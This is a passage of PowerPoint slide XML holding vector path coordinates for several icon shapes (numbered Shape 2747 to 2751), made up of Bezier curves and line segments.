                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13745" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="8295"/>
                  <a:pt x="13305" y="7855"/>
                  <a:pt x="12764" y="7855"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4909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4909" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="982"/>
                  <a:pt x="4909" y="4909"/>
                  <a:pt x="4909" y="4909"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4909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4909" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5451" y="5891"/>
                  <a:pt x="5891" y="5451"/>
                  <a:pt x="5891" y="4909"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5891" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="440"/>
                  <a:pt x="5451" y="0"/>
                  <a:pt x="4909" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="16691"/>
                  <a:pt x="20618" y="20618"/>
                  <a:pt x="20618" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16149" y="15709"/>
                  <a:pt x="15709" y="16149"/>
                  <a:pt x="15709" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="21160"/>
                  <a:pt x="16149" y="21600"/>
                  <a:pt x="16691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6691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="16149"/>
                  <a:pt x="21160" y="15709"/>
                  <a:pt x="20618" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="4909"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691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16691" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16149" y="0"/>
                  <a:pt x="15709" y="440"/>
                  <a:pt x="15709" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="5451"/>
                  <a:pt x="16149" y="5891"/>
                  <a:pt x="16691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16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="16691"/>
                  <a:pt x="4909" y="20618"/>
                  <a:pt x="4909" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4909" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440" y="15709"/>
                  <a:pt x="0" y="16149"/>
                  <a:pt x="0" y="16691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16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="16149"/>
                  <a:pt x="5451" y="15709"/>
                  <a:pt x="4909" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12764" y="4909"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="982"/>
                  <a:pt x="12764" y="4909"/>
                  <a:pt x="12764" y="4909"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12764" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8295" y="0"/>
                  <a:pt x="7855" y="440"/>
                  <a:pt x="7855" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="5451"/>
                  <a:pt x="8295" y="5891"/>
                  <a:pt x="8836" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12764" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13305" y="5891"/>
                  <a:pt x="13745" y="5451"/>
                  <a:pt x="13745" y="4909"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13745" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="440"/>
                  <a:pt x="13305" y="0"/>
                  <a:pt x="12764" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4909" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="12764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12764"/>
                  <a:pt x="4909" y="12764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909" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5451" y="13745"/>
                  <a:pt x="5891" y="13305"/>
                  <a:pt x="5891" y="12764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7" name="Shape 2747"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="55490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618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="8836"/>
                  <a:pt x="20618" y="20618"/>
                  <a:pt x="20618" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="7855"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8295" y="7855"/>
                  <a:pt x="7855" y="8295"/>
                  <a:pt x="7855" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="21160"/>
                  <a:pt x="8295" y="21600"/>
                  <a:pt x="8836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8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="8295"/>
                  <a:pt x="21160" y="7855"/>
                  <a:pt x="20618" y="7855"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="4909"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="49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4909"/>
                  <a:pt x="20618" y="490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4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5451"/>
                  <a:pt x="440" y="5891"/>
                  <a:pt x="982" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="5891"/>
                  <a:pt x="21600" y="5451"/>
                  <a:pt x="21600" y="49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909" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="8836"/>
                  <a:pt x="4909" y="20618"/>
                  <a:pt x="4909" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4909" y="7855"/>
                </a:move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4909" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5451" y="21600"/>
                  <a:pt x="5891" y="21160"/>
                  <a:pt x="5891" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5891" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="8295"/>
                  <a:pt x="5451" y="7855"/>
                  <a:pt x="4909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8" name="Shape 2748"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238863" y="394926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8280" y="18579"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20323" y="16614"/>
                  <a:pt x="21600" y="13859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cubicBezTo>
                  <a:pt x="4836" y="0"/>
                  <a:pt x="0" y="4835"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13859"/>
                  <a:pt x="1277" y="16614"/>
                  <a:pt x="3320" y="18579"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2107" y="20762"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2019" y="20851"/>
                  <a:pt x="1964" y="20974"/>
                  <a:pt x="1964" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="21380"/>
                  <a:pt x="2184" y="21600"/>
                  <a:pt x="2455" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2590" y="21600"/>
                  <a:pt x="2713" y="21545"/>
                  <a:pt x="2802" y="21456"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2858" y="21400"/>
                  <a:pt x="2894" y="21327"/>
                  <a:pt x="2917" y="21248"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4044" y="19219"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5895" y="20706"/>
                  <a:pt x="8242" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13358" y="21600"/>
                  <a:pt x="15705" y="20706"/>
                  <a:pt x="17555" y="19219"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18683" y="21248"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18743" y="21450"/>
                  <a:pt x="18923" y="21600"/>
                  <a:pt x="19145" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19416" y="21600"/>
                  <a:pt x="19636" y="21380"/>
                  <a:pt x="19636" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="20974"/>
                  <a:pt x="19581" y="20851"/>
                  <a:pt x="19493" y="20762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19493" y="20762"/>
                  <a:pt x="18280" y="18579"/>
                  <a:pt x="18280" y="18579"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="16691"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7547" y="16691"/>
                  <a:pt x="4909" y="14053"/>
                  <a:pt x="4909" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="7547"/>
                  <a:pt x="7547" y="4909"/>
                  <a:pt x="10800" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14053" y="4909"/>
                  <a:pt x="16691" y="7547"/>
                  <a:pt x="16691" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="14053"/>
                  <a:pt x="14053" y="16691"/>
                  <a:pt x="10800" y="16691"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="3927"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7004" y="3927"/>
                  <a:pt x="3927" y="7004"/>
                  <a:pt x="3927" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="14596"/>
                  <a:pt x="7004" y="17673"/>
                  <a:pt x="10800" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14596" y="17673"/>
                  <a:pt x="17673" y="14596"/>
                  <a:pt x="17673" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="7004"/>
                  <a:pt x="14596" y="3927"/>
                  <a:pt x="10800" y="3927"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="12764"/>
                </a:move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moveTo>
                  <a:pt x="10800" y="7855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9173" y="7855"/>
                  <a:pt x="7855" y="9173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9173"/>
                  <a:pt x="12427" y="7855"/>
                  <a:pt x="108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49" name="Shape 2749"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822911" y="3949265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2884"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19862" y="3005"/>
                  <a:pt x="15661" y="5580"/>
                  <a:pt x="11606" y="4718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9681" y="4310"/>
                  <a:pt x="8390" y="3899"/>
                  <a:pt x="7251" y="3535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5426" y="2953"/>
                  <a:pt x="4042" y="2513"/>
                  <a:pt x="1543" y="2647"/>
                </a:cubicBez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2884"/>
                  <a:pt x="20057" y="2884"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20057" y="5891"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20057" y="9144"/>
                  <a:pt x="15912" y="11782"/>
                  <a:pt x="10800" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5688" y="11782"/>
                  <a:pt x="1543" y="9144"/>
                  <a:pt x="1543" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1543" y="3634"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3681" y="3500"/>
                  <a:pt x="4767" y="3841"/>
                  <a:pt x="6560" y="4413"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7686" y="4772"/>
                  <a:pt x="9088" y="5219"/>
                  <a:pt x="11118" y="5650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11869" y="5809"/>
                  <a:pt x="12616" y="5877"/>
                  <a:pt x="13343" y="5877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16154" y="5877"/>
                  <a:pt x="18675" y="4862"/>
                  <a:pt x="20057" y="4176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20057" y="4176"/>
                  <a:pt x="20057" y="5891"/>
                  <a:pt x="20057" y="5891"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20829" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="771" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="0"/>
                  <a:pt x="0" y="220"/>
                  <a:pt x="0" y="491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="9521"/>
                  <a:pt x="4426" y="12486"/>
                  <a:pt x="10029" y="12739"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10029" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3857" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3432" y="20618"/>
                  <a:pt x="3086" y="20838"/>
                  <a:pt x="3086" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3086" y="21380"/>
                  <a:pt x="3432" y="21600"/>
                  <a:pt x="3857" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17743" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18168" y="21600"/>
                  <a:pt x="18514" y="21380"/>
                  <a:pt x="18514" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18514" y="20838"/>
                  <a:pt x="18168" y="20618"/>
                  <a:pt x="17743" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11571" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11571" y="12739"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17174" y="12486"/>
                  <a:pt x="21600" y="9521"/>
                  <a:pt x="21600" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="220"/>
                  <a:pt x="21254" y="0"/>
                  <a:pt x="2082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0" name="Shape 2750"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7381565" y="3949265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0800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2160" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2160" y="7752"/>
                  <a:pt x="4094" y="6873"/>
                  <a:pt x="6480" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15120" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17506" y="6873"/>
                  <a:pt x="19440" y="7752"/>
                  <a:pt x="19440" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19440" y="8836"/>
                  <a:pt x="19440" y="10800"/>
                  <a:pt x="19440" y="10800"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19440" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2160" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19440" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19440" y="11782"/>
                  <a:pt x="19440" y="15709"/>
                  <a:pt x="19440" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19440" y="18655"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19440" y="19739"/>
                  <a:pt x="17506" y="20618"/>
                  <a:pt x="15120" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6480" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4094" y="20618"/>
                  <a:pt x="2160" y="19739"/>
                  <a:pt x="2160" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2160" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19440" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19440" y="16691"/>
                  <a:pt x="19440" y="18655"/>
                  <a:pt x="19440" y="18655"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8640" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12960" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12960" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8640" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8640" y="5891"/>
                  <a:pt x="8640" y="2945"/>
                  <a:pt x="8640" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8640" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12960" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12960" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8640" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8640" y="1964"/>
                  <a:pt x="8640" y="982"/>
                  <a:pt x="8640" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15120" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15120" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15120" y="440"/>
                  <a:pt x="14152" y="0"/>
                  <a:pt x="12960" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8640" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7448" y="0"/>
                  <a:pt x="6480" y="440"/>
                  <a:pt x="6480" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6480" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2901" y="5891"/>
                  <a:pt x="0" y="7209"/>
                  <a:pt x="0" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="20281"/>
                  <a:pt x="2901" y="21600"/>
                  <a:pt x="6480" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15120" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18698" y="21600"/>
                  <a:pt x="21600" y="20281"/>
                  <a:pt x="21600" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="7209"/>
                  <a:pt x="18698" y="5891"/>
                  <a:pt x="1512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1" name="Shape 2751"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889433" y="3949265"/>
            <a:ext cx="17775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114" y="15709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12689" y="15709"/>
                  <a:pt x="12343" y="15929"/>
                  <a:pt x="12343" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12343" y="16471"/>
                  <a:pt x="12689" y="16691"/>
                  <a:pt x="13114" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13540" y="16691"/>
                  <a:pt x="13886" y="16471"/>
                  <a:pt x="13886" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13886" y="15929"/>
                  <a:pt x="13540" y="15709"/>
                  <a:pt x="13114" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13886" y="7855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13034" y="7855"/>
                  <a:pt x="12343" y="8295"/>
                  <a:pt x="12343" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12343" y="9379"/>
                  <a:pt x="13034" y="9818"/>
                  <a:pt x="13886" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14737" y="9818"/>
                  <a:pt x="15429" y="9379"/>
                  <a:pt x="15429" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15429" y="8295"/>
                  <a:pt x="14737" y="7855"/>
                  <a:pt x="13886" y="7855"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8486" y="17673"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8060" y="17673"/>
                  <a:pt x="7714" y="17892"/>
                  <a:pt x="7714" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7714" y="18435"/>
                  <a:pt x="8060" y="18655"/>
                  <a:pt x="8486" y="18655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8911" y="18655"/>
                  <a:pt x="9257" y="18435"/>
                  <a:pt x="9257" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9257" y="17892"/>
                  <a:pt x="8911" y="17673"/>
                  <a:pt x="8486" y="17673"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9257" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9257" y="10258"/>
                  <a:pt x="8566" y="9818"/>
                  <a:pt x="7714" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6863" y="9818"/>
                  <a:pt x="6171" y="10258"/>
                  <a:pt x="6171" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6171" y="11343"/>
                  <a:pt x="6863" y="11782"/>
                  <a:pt x="7714" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8566" y="11782"/>
                  <a:pt x="9257" y="11343"/>
                  <a:pt x="9257" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10029" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9603" y="13745"/>
                  <a:pt x="9257" y="13965"/>
                  <a:pt x="9257" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9257" y="14508"/>
                  <a:pt x="9603" y="14727"/>
                  <a:pt x="10029" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10454" y="14727"/>
                  <a:pt x="10800" y="14508"/>
                  <a:pt x="10800" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="13965"/>
                  <a:pt x="10454" y="13745"/>
                  <a:pt x="10029" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20057" y="1964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1543" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1543" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20057" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20057" y="982"/>
                  <a:pt x="20057" y="1964"/>
                  <a:pt x="20057" y="1964"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16971" y="4033"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16079" y="4186"/>
                  <a:pt x="15266" y="4419"/>
                  <a:pt x="14349" y="4691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13209" y="5030"/>
                  <a:pt x="11919" y="5413"/>
                  <a:pt x="9994" y="5794"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8093" y="6170"/>
                  <a:pt x="6167" y="5840"/>
                  <a:pt x="4629" y="5373"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4629" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16971" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16971" y="2945"/>
                  <a:pt x="16971" y="4033"/>
                  <a:pt x="16971" y="4033"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16971" y="16691"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16971" y="18860"/>
                  <a:pt x="14208" y="20618"/>
                  <a:pt x="10800" y="20618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7391" y="20618"/>
                  <a:pt x="4629" y="18860"/>
                  <a:pt x="4629" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4629" y="6384"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5722" y="6667"/>
                  <a:pt x="6954" y="6874"/>
                  <a:pt x="8257" y="6874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8984" y="6874"/>
                  <a:pt x="9731" y="6811"/>
                  <a:pt x="10481" y="6662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12512" y="6261"/>
                  <a:pt x="13914" y="5844"/>
                  <a:pt x="15040" y="5510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15760" y="5295"/>
                  <a:pt x="16366" y="5119"/>
                  <a:pt x="16971" y="4989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16971" y="4989"/>
                  <a:pt x="16971" y="16691"/>
                  <a:pt x="16971" y="16691"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20057" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1543" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="691" y="0"/>
                  <a:pt x="0" y="440"/>
                  <a:pt x="0" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2506"/>
                  <a:pt x="691" y="2945"/>
                  <a:pt x="1543" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3086" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3086" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3086" y="19402"/>
                  <a:pt x="6539" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15061" y="21600"/>
                  <a:pt x="18514" y="19402"/>
